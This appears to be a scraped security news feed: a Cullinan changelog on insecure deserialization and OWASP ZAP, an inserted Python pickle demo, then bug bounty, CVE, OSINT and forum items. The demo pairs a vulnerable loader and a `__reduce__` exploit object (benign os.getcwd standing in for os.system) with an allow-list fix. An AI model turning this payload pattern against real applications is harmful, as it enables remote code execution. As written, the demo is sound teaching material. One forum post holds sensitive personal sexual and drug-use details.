    This is Cullinan log #27. It's been a little while since the last one. Add category cullinan; Add OWASP ZAP; Add Insecure Deserialization; Change SQLMap (Add scanning to X). ZAP and Insecure Deserialization are newly added, and there were some changes on the SQLMap side. ZAP will probably... get revised very often; there is just so much of it 😵‍💫 I am also adding more features to Cullinan overall, and as the first step, categories have been applied. That's all for now 👋🏼
    Insecure Deserialization
    🔍 Introduction: Insecure Deserialization means, literally, deserialization that is not safe. During deserialization, objects the developer never intended may be deserialized, causing problems in the business logic or, depending on the conditions, making the application execute code the attacker chose, so the risk is high. First, serialization and deserialization: in development, converting an in-memory object into external data such as a file is called serialization, and converting external data such as a file back into an in-program object is called deserialization. 🗡 Offensive techniques: Detect. Without looking at the source code, it is hard to be certain that a given process is a deserialization process.
    OWASP ZAP
    Introduction: ZAP (Zed Attack Proxy) is an OWASP flagship project, a security testing tool and vulnerability scanner for vulnerability assessment, penetration testing, runtime testing and code review. Alongside Burp Suite it is a primary tool of security engineers and bug bounty hunters, and because it provides CLI commands, a REST API, a Jenkins plugin, a GitHub Action and more, it is also widely used as a DAST scanner in DevSecOps, that is, in CI/CD pipelines. Personally, I really love this project. Whatever else one says, nothing compares to its Fuzzer and Scripting. The best! Installation: install it using the installer package for your OS from the URL below.
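    To make the Insecure Deserialization entry above concrete, here is an added Python example (mine, not code from Cullinan or from the post): a pickle-based session loader in its vulnerable form beside a hardened one. A pickle is not inert data but a small program for the unpickler, so whoever controls the bytes can name any importable callable through `__reduce__` and have it run during `loads`. The hardened loader overrides `find_class` with an allow-list so only the one class the application expects can be reconstructed. `Session`, `Exploit` and the two blobs are constructed for the demo; the "exploit" calls the harmless `os.getcwd` where a real payload would call `os.system`.

```python
import io
import os
import pickle
from dataclasses import dataclass


@dataclass
class Session:
    """The only type the application legitimately stores in a session blob."""
    user: str
    is_admin: bool = False


class Exploit:
    """Constructed attacker object. __reduce__ tells the unpickler which callable
    to invoke and with what arguments; a real payload would return
    (os.system, ("...",)). os.getcwd stands in so the demo has no side effects."""

    def __reduce__(self):
        return (os.getcwd, ())


def unsafe_load(blob: bytes):
    # Vulnerable: pickle.loads resolves and calls whatever global the blob names.
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    # (module, name) pairs the unpickler may resolve; everything else is refused
    # before it is imported or called.
    ALLOWED = {(Session.__module__, "Session")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def safe_load(blob: bytes):
    # Hardened: same wire format, but only Session can be reconstructed.
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def rejects(blob: bytes) -> bool:
    """True if the hardened loader refuses the blob."""
    try:
        safe_load(blob)
    except pickle.UnpicklingError:
        return True
    return False


def make_session_blob() -> bytes:
    return pickle.dumps(Session("alice"))


def make_exploit_blob() -> bytes:
    # Pickling Exploit() stores only a reference to os.getcwd plus an empty
    # argument tuple; the Exploit class itself never appears in the blob.
    return pickle.dumps(Exploit())


if __name__ == "__main__":
    print(unsafe_load(make_session_blob()))   # Session(user='alice', is_admin=False)
    print(unsafe_load(make_exploit_blob()))   # the attacker's callable ran: current directory
    print(safe_load(make_session_blob()))     # Session(user='alice', is_admin=False)
    print(rejects(make_exploit_blob()))       # True
```

    The allow-list is the real fix, not input filtering: the malicious blob contains no reference to `Exploit`, only to `os.getcwd`, so scanning for suspicious class names would miss it. Where the data only needs to cross a trust boundary, a format with no code-loading semantics (JSON with an explicit schema) is the better choice and the restricted unpickler is the fallback for legacy blobs you cannot yet replace.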
  • Open

    Self XSS in Create New Workspace Screen
    Mattermost disclosed a bug submitted by rynexxx: https://hackerone.com/reports/1442017 - Bounty: $50
  • Open

    The Red Cross Data Breach Exploited a ManageEngine Vulnerability by APT27
    Article URL: https://www.thecybersecuritytimes.com/the-red-cross-data-breach-exploited-a-manageengine-vulnerability-by-apt27/ Comments URL: https://news.ycombinator.com/item?id=30403952 Points: 1 # Comments: 1  ( 4 min )
  • Open

    Red Team Engagement Planning
    A short article outlining the phases to go through, while planning a red team engagement. Continue reading on Medium »  ( 2 min )

  • Open

    Privilege Escalation Vulnerability in Snapd
    Article URL: https://ubuntu.com/security/notices/USN-4728-1 Comments URL: https://news.ycombinator.com/item?id=30401324 Points: 1 # Comments: 0  ( 2 min )
  • Open

    Printer assigned a drive letter in Windows
    Has anyone else come across a printer that was assigned a drive letter? I’ve never seen this in my personal life but it stood out to me while I was working a case. In this instance, it was a Brother printer assigned to D:. Does doing this provide any additional functionality rather than just printing documents? submitted by /u/ebarboza311 [link] [comments]  ( 1 min )
    Missing $UsnJrnl
    Hi guys, what can be the reason for not having a $UsnJrnl on an NTFS filesystem? submitted by /u/Donato_Francesco [link] [comments]  ( 1 min )
  • Open

    The ultimate guide to improving your competitive research on Google
    Want to improve your queries when researching a competitor or your market? Continue reading on Medium »  ( 3 min )
    Phishing Domain Tool — DnsTwist Part 2
    Dnstwist is an open-source tool used to identify phishing domains, typosquatting domains, attack domains and brand impersonation. Dnstwist… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 12
    And back again with another Hacktoria Geolocation challenge to solve. I love GEOINT challenges, especially when they force me to learn… Continue reading on InfoSec Write-ups »  ( 6 min )

    "The installation of this device is forbidden by system policy"
    I keep getting these notifications without me trying to install any new device or driver. I would like to know what the source of this is. I tried to look into my Event Viewer without success. submitted by /u/ak_z
    Small matter: Are Malwarebytes Privacy Guard and Privacy Badger basically doing the same thing? I've had a problem with my browser sticking and it might be conflicting extensions.
    Thank you. submitted by /u/jacobspartan1992
    Which framework should I learn or at least get familiar with first? (Ghidra, IDA, Radare2)
    Hey Chief, I'm trying to get ahead in reversing binaries, and I really ain't got any idea about which framework I should pick up first. Can you help? submitted by /u/The_Intellectualist
    SOC 2 report
    Why are SOC 2 reports made by CPAs? For SOC 1 I get it, but not SOC 2. How can they audit IT security being accountants? submitted by /u/Xctzn

    Windows Privilege Escalation: PrintNightmare
    Introduction: Print Spooler has been on researchers’ radar ever since the Stuxnet worm used a Print Spooler privilege escalation vulnerability to spread through the network in nuclear The post Windows Privilege Escalation: PrintNightmare appeared first on Hacking Articles.

    SecWiki News 2022-02-19 Review
    No news updates today. For more of the latest articles, visit SecWiki

    Querying Spotlight APIs With JXA
    TL;DR This blog post takes a brief look at how to use JXA (native JavaScript for Automation on macOS) to query Spotlight APIs. In… Continue reading on Medium »
    Attacktive Directory — THM
    Attacktive Directory is a box hosted on Try Hack Me. This is a medium-rated box, but great for any new red team member or penetration… Continue reading on Medium »

    Directory Traversal — what is it?
    Local File Inclusion Continue reading on System Weakness »
    PORTSWIGGER WEB SECURITY - SSRF (SERVER SIDE REQUEST FORGERY) LAB SOLUTIONS
    If the data used in a web application is retrieved through an external source, and an attacker … the request sent by the web server… Continue reading on Medium »

    Certipy 2.0: BloodHound, New Domain Privilege Escalation Techniques, Shadow Credentials, Golden Certificates, and more!
    submitted by /u/ly4k_

    pictures of people playing motorcycle soccer
    submitted by /u/PM_ME_TO_PLAY_A_GAME

    Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)
    submitted by /u/digicat

    Lazarus group begins using LOLBin techniques
    Researchers have discovered a new Lazarus attack campaign that uses job postings from the defense sector as phishing bait.

    Expat library: libexpat 2.4.5 (CVE fixes)
    Article URL: https://github.com/libexpat/libexpat/blob/R_2_4_5/expat/Changes Comments URL: https://news.ycombinator.com/item?id=30393397 Points: 1 # Comments: 0

    Microsoft Brings eBPF to Windows unlocking security and networking use cases
    submitted by /u/markcartertm
    Personnel Security, Separation of Duties, Least Privilege, Need to Know, Vendor, Consultant and Contractor Controls, Security Governance, Risk Management
    submitted by /u/Tradition_Wonderful
    Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine)
    submitted by /u/0xdea
    AWS GuardDuty Exfiltration Bypass with VPC Endpoints
    submitted by /u/d_o_d_o_
    Extensis Portfolio - Remote Code Execution Vulnerability Disclosure
    submitted by /u/hashput1n

    What is it like to work a computer forensics job?
    What is working a computer forensics job like? Is it as easy and simple as just plugging in a hard drive or phone or anything that needs data recovery to retrieve the data, or is it much harder and more work? Just wondering because I am a computer science major, currently a freshman; I might want to do computer forensics because it interests me. submitted by /u/Ill-Date-1852
    Where do deleted browser history go to?
    I know when you delete something, it never really gets deleted. So just curious, where does cleared browsing history for Chrome/Safari go? And are we able to retrieve it? submitted by /u/b4dboyrere
    How do you really get into incident response
    I have recently graduated from college with a Bachelor's in DF, but the school I went to was really more geared towards what police officers deal with (like criminal activity and all). How should I really go about learning more of the incident response side of forensics? Any good references to YouTube channels, textbooks, websites, etc. are much appreciated! submitted by /u/JunketThat2134

    eCPTX Exam Review
    eLearnSecurity Certified Penetration Tester eXtreme Continue reading on The Mayor »
    AWS GuardDuty Exfiltration Bypass
    On January 20, 2022, Amazon AWS introduced a new threat detection in GuardDuty to block credential exfiltration. Can it be bypassed? Continue reading on Dev Genius »

    Is it possible to bulk download?
    So there's an album I'm wanting to download from an OD (Queen's complete Platinum Collection, which includes over 200 mins of music) and I'm wanting to know if there is a way to go and bulk download all the files without having to press a link, right click, and click "Save audio as..." every time. submitted by /u/Raven_Claw7621
    Software (Not Tested)
    https://fichiers.meca.polymtl.ca/?hidden submitted by /u/CalmWater8439
    Quake 3 Arena/OpenArena maps and other goodies
    submitted by /u/SpaceOtterMafia
    Best way to limit results by language?
    Greetings! I am currently new to the usage of open directories and have been wondering how to limit my results for a movie, for example, to only my language. I am using the "all resources I know" guide to construct my searches. Example: intext:"Search Term" intitle:"index.of" +(wmv|mpg|avi|mp4|mkv|mov) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) The Guide: https://www.reddit.com/r/opendirectories/comments/933pzm/all_resources_i_know_related_to_open_directories/ submitted by /u/TwinkleTheToothFairy

    Severe Vulnerability Fixed in UpdraftPlus 1.22.3
    Article URL: https://jetpack.com/2022/02/17/severe-vulnerability-fixed-in-updraftplus-1-22-3/ Comments URL: https://news.ycombinator.com/item?id=30391454 Points: 1 # Comments: 1
    Local root vulnerability in snap-confine
    Article URL: https://lwn.net/Articles/885195/ Comments URL: https://news.ycombinator.com/item?id=30381169 Points: 2 # Comments: 0

    Hacking the marketplace
    Guys! This room is great and I had a lot of fun; with this room you can learn this: Continue reading on System Weakness »
    Recon and YouTube, is that a thing?
    Hey fellow hunters, hope you all are doing fine. This is my first ever blog; I will try to keep it as simple as possible, spilling as… Continue reading on Medium »
    How I was able to hack Cambridge University (Arabic)
    Peace be upon you, your brother Nasser here. Because of your previous support for me, I decided to write this article. Continue reading on Medium »
    Bug Zero is Going to Pay Your Security Bill for 2022
    tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats. Continue reading on Bug Zero »
    Bug Bounties in Sri Lanka
    tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats. Continue reading on Bug Zero »
    Cardano Foundation Doubles Reward Offered to Hackers for Uncovering Bugs on Its Blockchain
    Continue reading on Medium »
    Results of the Firefly security audits
    Original: https://firefly.exchange/blog/results-from-firefly-security-audits Continue reading on Medium »
    I’ve made over $588k on Bug Bounty so far
    How much can one earn on Bug Bounty? Continue reading on Medium »
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters, Continue reading on InfoSec Write-ups »
    Starswap’s Second Bug Bounty Program
    Starswap is already live on Starcoin’s test network, barnard, as the first step in realizing our ambitious vision of a fully functional… Continue reading on Medium »

    Android
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/1343528 - Bounty: $3000

    Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign
    One of the more common infections that we see are site-wide redirects to spam and scam sites, achieved by attackers exploiting newly found vulnerabilities in popular WordPress plugins. If you’ve ever been redirected to a page that looks something like this, then you’ve fallen victim to such an attack: Once the user clicks through the verification process they are sent to a fake CAPTCHA page asking the user to click to prove they are a human: As we have reported in the past on this type of infection: The goal is to trick visitors into clicking “Allow” when the site asks to subscribe to push notifications. Continue reading Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign at Sucuri Blog.

    Free cybersecurity frameworks to try?
    I am just looking around to see if there are any more frameworks I can use to harden our systems. I have already been using the STIG and CIS tools and am about 85% compliant on both. Are there any more free resources I can use to scan against our machines to see if there is anything else I can do to harden them? Thanks submitted by /u/KillingRyuk
    I believe my files were stolen whilst connected to a hacker's personal network, but something doesn't add up. [NSFW]
    So, a friend of mine is in Cybersecurity. I study Cybersecurity and am less advanced in my journey than he is. He's very much into fraud, malware, spyware, etc. So, a few background things - I have anorexia nervosa. He knows this. We have been friends for over 3 years now. We are friends with benefits. We are both meth addicts and I'm heavily dependent on weed. I have an album on my phone containing all my bodychecks. It is stored in the main SD card directory. I have a Samsung Galaxy S20 5G, running Android 11. So one day, he invited me over to record a sex tape. Okay, whatever. So I went to his house, ended up sucking his dick, he finishes. We chat for a bit, I'm in his loungeroom on his couch for an hour or so. At one point early on I mention that I am downloading a large file onto my phone. He asks if I want to use his Wi-Fi, and I accept. When I'm connecting, he convinces me to use my phone MAC address. Okay. I try to browse the Internet while I wait but the connection is garbage. I receive a text from our other friend who wants to buy weed off me. He immediately ushers me out the door despite suggestions of a Round 2 earlier. Later that night, I notice that when posting to my Instagram, all the recent photos are my bodychecks. Despite me not having touched that folder at all in the past six months. All the photos are there, twice - in my recent photos and where they originally were. I cannot find any duplicate albums on my phone that would cause this. This all happened last week, but the files were modified again last night. Should I be worried? submitted by /u/856850835
    Security Metrics
    So I'm working on a security project now and we have a bunch of issues that need fixing over a number of areas, and I need a way of prioritising these items and showing that the security of the system is improving. Normally you would use CVSS to calculate this; however, this program won't be dealing with just vulnerabilities in the product but also in operations and governance. How do you prioritise updating a library in your product with an RCE against a GDPR issue or an internal tool with weak password policies? Also, how do you score the system overall to show that fixing these issues has improved the overall security posture? submitted by /u/dbxp

    SecWiki News 2022-02-18 Review
    Attacking TCP traffic with IP fragment pollution by ourren; Open-source framework for a “red-blue confrontation exercise scoring system” (preview) by ourren; Effectiveness of CSRF defenses in web frameworks by ourren; PRIVGUARD: a data governance framework for GDPR privacy compliance by ourren; Man in the middle: analysis of NTLM relay attacks by ourren; The “3 protections and 1 assessment” you must understand in cybersecurity work by ourren. For more of the latest articles, visit SecWiki

    Hacktoria: Geolocation 10 (Walkthrough)
    Hacktoria: Geolocation 10 (Walkthrough) Continue reading on Medium »
    Tattoos for Buildings — OSINT Challenge 17
    On Jan 24, 2022, Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out when… Continue reading on Medium »
    OSINT: How to extract text from an image or video
    Did you ever wonder what a piece of foreign text means on a sign, banner, or in a video? Sure, you can type it into Google Translate or speak… Continue reading on Medium »

    How Netsparker can help with AppSec compliance
    Demonstrating web application compliance with various security standards and practices is crucial in many industries. To help you scan applications and prepare reports for common web security compliance requirements, Netsparker by Invicti comes with a host of predefined compliance checks and reports, including OWASP Top 10, PCI DSS, HIPAA, NIST SP 800-53, and more.

    Just 7 Days Left for IWCON2022. Have You Registered Yet?
    Infosec Writeups is Organizing Our First Virtual Conference and Networking Event — and we want you to be a part!
    CyberDefenders Qradar101 Write-up
    This write-up is based on the CyberDefenders Qradar101 challenge from Ali Alwashali.
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters,

    FreeBuf Morning Report | Meta pays $90 million in privacy case; Google launches new privacy protection policy
    Facebook’s parent company Meta has agreed to pay $90 million to settle a lawsuit filed ten years ago.
    A Golang-based botnet is becoming a new threat
    Recently, cybersecurity researchers cracked a new botnet named Kraken. The botnet is developed in Golang, and the hackers behind it are actively optimizing and upgrading it.
    Google announces it will introduce a “Privacy Sandbox” into Android
    Google announced on Wednesday that it plans to bring Privacy Sandbox to Android, aiming to extend advertising technology that respects privacy without disrupting users to the mobile web.
    Ransomware rampant: 623 million attacks detected in 2021
    IoT malware, encrypted threats and cryptojacking all maintained rapid growth throughout the year.
    FreeBuf Weekly | Internet Society data leak; Ukraine hit by large-scale DDoS attacks
    The Security Service of Ukraine (SSU) claims that this cyberattack against Ukraine was a premeditated, organized operation with a large “hidden hand” behind it.
    Hackers infiltrate Microsoft Teams to send malware
    Hackers are abusing Microsoft Teams and spreading malicious executable files in chats.
    A slip-up: Transparent Tribe and SideCopy share infrastructure and give themselves away
    Quick Heal disclosed a data-theft campaign targeting Indian defense forces and army personnel and named it Operation SideCopy.
    FreeBuf Enterprise Group Discussion | Personal data privacy in enterprise security operations
    As an enterprise security department, how do you protect the private data of every “transparent person” in the platform-data era while keeping the enterprise running securely and stably?
    The giant concedes! Meta to pay $90 million
    The case accused Meta of using cookies to track Facebook users who had logged out of their accounts.
    Your vibrator? Hackers are very interested
    Bullet vibrators and massage wands are your late-night companions, and they may also be quietly leaking your usage data.

    Why symbolic execution is the leading-edge method for generating test values
    In the first blog post of our blog series on Symflower’s Core Technology, we explained how symbolic execution works and how we apply it to… Continue reading on Medium »

    Watch "C0V3RT - "Just For Fun" Challenge Lock (Picked & Gutted)" on YouTube
    submitted by /u/Can0pen3r

    Internals of Go's new fuzzing system
    Article URL: https://jayconrod.com/posts/123/internals-of-go-s-new-fuzzing-system Comments URL: https://news.ycombinator.com/item?id=30380994 Points: 2 # Comments: 0

    Would you support brain forensics (mind reading)
    Poll submitted by /u/themariocrafter
    Who is running sysmon on workstations and forwarding to SIEM?
    Hi, just wondering if any enterprise-size companies are running Sysmon on workstations and/or servers and forwarding the events to some sort of logger/SIEM? What are the pros and cons? submitted by /u/antmar9041
    PDF Analysis for adult content
    I have a PDF that consists of ~27,000 pages and >42,000 images (it's a Cellebrite extraction report from an iPhone). I need to know how many of the images are "adult" in nature. I know Google (https://cloud.google.com/vision/docs/detecting-safe-search) and Microsoft (https://docs.microsoft.com/en-us/azure/cognitive-services/computer-vision/concept-detecting-adult-content) both have "A.I." based image filtering APIs that can automatically scan images and find adult/gore/explicit images, but I'm not aware of any software that leverages these technologies (or something similar). What I'm looking for: 1. The best way to dump this many images from a PDF file, and 2. The best way to scan that dump for explicit images (or a way to just scan the PDF file directly and skip dumping the images). submitted by /u/agrowland

    How to track vehicles using Open Source Imagery
    Vehicle information can be a fantastic tool for investigators to scrutinize and track a real-world target, but what OSINT opportunities can… Continue reading on Medium »
    Hacktoria: Geolocation 14 (Walkthrough)
    Hacktoria: Geolocation 14 (Walkthrough) Continue reading on Medium »
    Solving Dojo’s geolocation quiz
    One day, when I was surfing the internet, my Twitter pushed me a tweet; let’s see what the tweet says: Continue reading on Medium »
    OSINT Tool - CarNet.ai
    The best tool to (correctly!) identify a vehicle’s brand and model using AI. Continue reading on Medium »

    Why should you not send sensitive data over email
    Currently the company I work for sends sensitive documents over email. They password protect them but then send the password also over email. submitted by /u/Linux98
    Is it safe to send my SSN over email to a Loan officer email, since she will need it to open up my credit report?
    My mom and I are in the process of trying to buy an apartment together. Mom will put it under my name. This is the first time I'm doing this and she told me I needed to email my SSN to the loan officer. I have Protonmail, which is a secure, encrypted email service. Would it be safe to send my SSN over email to the loan officer in this case, since she would need it to open my credit report? I do not know if the loan officer's email is encrypted or not. Or should I give her my SSN in another way, such as telling her on a phone call, to be on the safe side? Or would email be just fine? submitted by /u/Wastedmess
    Regarding changing passwords and NIST (My google-fu is failing me)
    NIST states in NIST Special Publication 800-63B under section 5.1.1.2 Memorized Secret Verifiers that: "Verifiers SHOULD NOT impose other composition rules (e.g., requiring mixtures of different character types or prohibiting consecutively repeated characters) for memorized secrets. Verifiers SHOULD NOT require memorized secrets to be changed arbitrarily (e.g., periodically). However, verifiers SHALL force a change if there is evidence of compromise of the authenticator." I'm a real stickler and was wondering if anyone knows what main research papers or investigations made them come to the recommendations above? Additionally, are there any respected research authorities on these types of questions in IT-sec? Thanks! submitted by /u/someuserman
    Company Phone in Sealed Box - Possible to be Monitored?
    Just got my company phone and it’s brand new in the sealed manufacturer's box and even has the carrier's sticker on it still. Is there any possible way my company could be monitoring my activity on this phone beyond the calls being made and quantity of texts/data usage? submitted by /u/sektrONE

    Self-Testing: Red Team Augmentation
    Red Team testing and Penetration testing are key controls to utilize as part of maintaining a mature security program. There is the… Continue reading on Medium »

    Local Privilege Escalation Vulnerability Discovered in snap-confine (CVE-2021-44731)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731 Comments URL: https://news.ycombinator.com/item?id=30378103 Points: 2 # Comments: 1
    Zabbix SAML Authentication Bypass (CVE-2022-23131) and more
    Article URL: https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage/ Comments URL: https://news.ycombinator.com/item?id=30372198 Points: 2 # Comments: 0

    T2 Mac security vulnerability means passwords can now be cracked
    Article URL: https://9to5mac.com/2022/02/17/t2-mac-security-vulnerability-passware/ Comments URL: https://news.ycombinator.com/item?id=30374224 Points: 32 # Comments: 6

    Top 10 API Bugs — Where To Find Them
    Ladies and Gentlemen, let’s do some API hacking today. I will discuss some of the top 10 API bugs and where one can find them. Continue reading on Medium »
    403 forbidden bypass & Accessing config files using a header
    This is my first writeup, on how I bypassed a 403 and accessed the config file. Continue reading on Medium »
    Beginner’s Guide to Bug Bounty Hunter
    How much money can you make as a bug bounty hunter? That’s the burning question on everyone’s mind, and it’s one that will take some time… Continue reading on Medium »
    Apple pays $100,500 to a student who discovered Mac webcam vulnerability
    Ryan Pickren, a cyber security student, was awarded $100,500 (around 75 lakhs) as a bounty after he showed Apple how a vulnerability… Continue reading on Medium »
    Bug Bounty: Should You Go Full-Time?
    In the comments, I was asked what turned out to be more profitable in terms of money as a result — my previous job as a developer or… Continue reading on Medium »

    Public STIX STIX2 TAXII Threat Actor Specific Threat Intelligence Feed - Your Lifetime API Key!
    Hi, everyone, This is Dancho. Big news! I've decided to make approximately 15 years of active and unique threat actor specific research publicly accessible online for free using the OpenCTI STIX STIX2 TAXII platform and not only convert all the cool and juicy and full of never-published and discussed before niche threat actors both internationally and in Russia but also make them into a free STIX STIX2 TAXII threat intelligence feed and turn them into a machine readable format with the idea to centralize and speed up the communication of my research and potentially allow you to better catch up improve your situational awareness and learn new things about the international bad guys including the bad guys in Russia including their Internet infrastructure and catch up with who they are and w…

    Learning secrets management in the modern world using OWASP WrongSecrets Project : Hands-on Labs, CTF style challenges
    submitted by /u/madhuakula
    Exploiting Jenkins build authorization
    submitted by /u/Alternative_Tour9985
    Tutorial: Kubernetes Vulnerability Scanning & Testing KubiScan & KubeSploit
    submitted by /u/jat0369
    CVE-2022-23131 - Zabbix SAML Authentication Bypass
    submitted by /u/monoimpact
    Advisory: Cisco RV340 Dual WAN Gigabit VPN Router (RCE over LAN)
    submitted by /u/g_e_r_h_a_r_d

    SecWiki News 2022-02-17 Review
    A large-scale study of malicious plugins in the WordPress ecosystem by Avenger; 2021 Industrial Control Network Security Posture White Paper by ourren. For more of the latest articles, visit SecWiki

    Avoiding Mixed Content Errors with an HTTPS Python Server
    Disclaimer: To set up a secure Python server, we need a domain name that we can access. 1. Introduction At some point during penetration testing, bug hunting, and capture the flag competitions, we will likely need to download a file or send a request to a server that we can access. Depending on what we... The post Avoiding Mixed Content Errors with an HTTPS Python Server appeared first on TrustedSec.

    Subdomain Takeover of brand.zen.ly
    Zenly disclosed a bug submitted by mega7: https://hackerone.com/reports/1474784 - Bounty: $750
    Missing SPF record on trycourier.app
    Courier disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1416701

    Analysis and research of the WebLogic HomeHandle deserialization vulnerability
    This article is a detailed analysis and study of CVE-2022-21350, for the purpose of discussing security techniques.
    US says Russian state hackers compromised defense contractors
    Russian hacking groups reportedly launched sustained attacks on US cleared defense contractors (CDCs).
    Be careful: the upcoming Chrome 100 and Firefox 100 may carry serious risks
    The upcoming Firefox 100 and Chrome 100 browser versions carry a serious risk: websites may break when parsing user-agent strings that contain a three-digit version number.
    schoolcms code audit
    I have been studying the ThinkPHP framework recently; today I picked a CMS to audit, found two injection points, and analyze them here.
    Will machine learning become a new data security threat and backdoor?
    Experts studying the security of machine learning and artificial intelligence systems warn that such systems could be exploited by skilled attackers in the future.
    FreeBuf Morning Report | US says Russian hackers breached multiple Department of Defense contractors; Trickbot targets customers of 60 well-known companies
    The International Committee of the Red Cross (ICRC) recently suffered a cyberattack in which the data of more than 515,000 “highly vulnerable” people was leaked, most likely the work of state-sponsored hackers.
    Is pixelation enough? A new technique can recover text from pixelated images
    This week, a principal researcher at security firm Bishop Fox clearly recovered the letters from a pixelated text image.
    The 10 hottest XDR security companies to watch in 2022
    Note: this article is reposted from SDNLAB for reference only. According to research firm Forrester, the extended detection and response (XDR) market is still at an early stage, and existing

    Browser Forensics — CryptoMiner
    Challenge Description
    Phishing: Creating and Analyzing
    Hello everyone,
    Memory Analysis — Ransomware (BlueTeamLabs)
    Challenge Description: The Account Executive called the SOC earlier and sounds very frustrated and angry. He stated he can’t access any…

    Broken Authentication Session Token Bug
    Courier disclosed a bug submitted by the_hacker_girl: https://hackerone.com/reports/948345

    Company refuses to provide any training for our SOC
    Since joining, multiple analysts have requested some type of training, whether it’s vendor-specific for tools like the SIEM or vendor-neutral training such as SANS, but management keeps saying our department is “self-taught” and there is no training budget. Which is odd considering how big of a corporation it is and how successful it is. Personally I’m shocked, as the companies I’ve worked for in the past all provided some type of training. How can I make a compelling case for getting our SOC analysts training? submitted by /u/bankster24
    What are some affordable and credible penetration testing certifications?
    I am a new penetration tester and I want to gather some certifications to be able to further my career. However, I have observed that cybersecurity certifications are particularly expensive; for example, the Certified Ethical Hacker (CEH) certification costs 1200 USD, which is a lot since I am planning to pay for them myself. I recently saw eLearnSecurity, particularly the eJPT, and it only costs 200 USD, which I think is great since it shows that I have some real-world and hands-on capabilities as a penetration tester. So are there any other certifications like the eJPT which are affordable and credible? Preferably around the same price as the eJPT, or better if lower. Thank you submitted by /u/darkalimdor18
    Book recommendations
    Looking for some good books to study up on foundational network concepts and maybe some stuff that could help me prepare for Network+ submitted by /u/Wintermane45

    What makes a great incident response engineer?
    submitted by /u/Real_Score_5035
    QUESTION: confiscated phone asks to update whatsapp
    Good afternoon, My local department wants to manually check WhatsApp messages on a phone. The phone has been in flight mode since we've confiscated it. We ran into the issue that when we want to launch WhatsApp it asks to update the WhatsApp software. If we want to do this, this means that we'll have to hook it up to our Wi-Fi network. Does this mean that if the suspect has deleted his messages through WhatsApp Web / another phone, this will also be synced with the WhatsApp on the phone? I also believe that WhatsApp is linked to a phone number. So it would rather be impossible for the suspect to get on his WhatsApp without his SIM card (this is in our possession as well). We also use the UFED Cellebrite, but WhatsApp conversations don't always come through. So what are our options to be able to get back into WhatsApp without loss of data? Thanks! submitted by /u/Tniso
  • Open

    Adobe Patches Critical RCE Vulnerability in Magento2
    On Sunday, February 13th, Adobe pushed an emergency update to their Magento2 ecommerce software patching a critical unauthenticated remote code execution vulnerability. It is tracked as CVE-2022-24086 with a CVSS score of 9.8. Website administrators of Magento stores should patch immediately. Shop owners of Magento 2.3 or 2.4 stores can find the patch to install here. Instructions on how to install Magento security patches via Composer can be found here. Our website firewall's generic rules block RCE exploitation attempts by default, but given the severity of the vulnerability website administrators should not leave their websites unpatched. Continue reading Adobe Patches Critical RCE Vulnerability in Magento2 at Sucuri Blog.

    Lodestar Joins the Consensus Layer Bug Bounty
    ChainSafe is happy to announce that we’ve been added to the Ethereum Foundation’s consensus layer bug bounty program for Lodestar, our… Continue reading on ChainSafe »
    File Inclusion Vulnerabilities - Cyber Sapiens Internship Task-19
    Hello guys 👋👋, Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern; in this I am regularly… Continue reading on Medium »
    Insecure Direct Object Reference - Cyber Sapiens Internship Task-18
    Hello guys 👋👋, Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern; in this I am regularly… Continue reading on Medium »
    No Rate Limiting Vulnerability & Bypasses - Cyber Sapiens Internship Task-17
    Hello guys 👋👋, Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern; in this I am regularly… Continue reading on Medium »
    Directory Listing Vulnerability - Cyber Sapiens Internship Task-16
    Hello guys 👋👋, Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern; in this I am regularly… Continue reading on Medium »
    Bug Report: Bypassing Weekly Limits in a Basic (Free) LinkedIn Account
    Publishing my first security vulnerability report for LinkedIn. Below is the report that I have submitted to LinkedIn Information Security… Continue reading on Medium »
    Hacked Dutch Government Website. All I got was this l̶o̶u̶s̶y̶ cool T-Shirt.
    They are right. Persistence is the key! Continue reading on Medium »
    What is a CSRF Attack?
    Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to submit a request to a web application against which they… Continue reading on Medium »
    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me, and I found this with Google dorks… Continue reading on InfoSec Write-ups »
    ImmuneFi and Octopus Network Launch a Juicy Bug Bounty
    Octopus Network 🐙 Continue reading on Medium »

    ‘Ice phishing’ on the blockchain
    submitted by /u/SCI_Rusher

    SecWiki News 2022-02-16 Review
    No news has been posted yet today. For more of the latest articles, visit SecWiki.

    Machine Learning Enrichment in your Data Asset Production Flow
    How discursus tackled the challenge of introducing ML enrichments in data asset production flows, using Dagster, dbt and Novacene AI. Continue reading on discursus.io »
    Power of Reverse Image Search — OSINT Challenge 16
    On Dec 22, 2021, Quiztime (contributor @twone2) shared a new OSINT quiz with us. Continue reading on Medium »

    How to Recruit Security R&D Talent Well: How to Hire
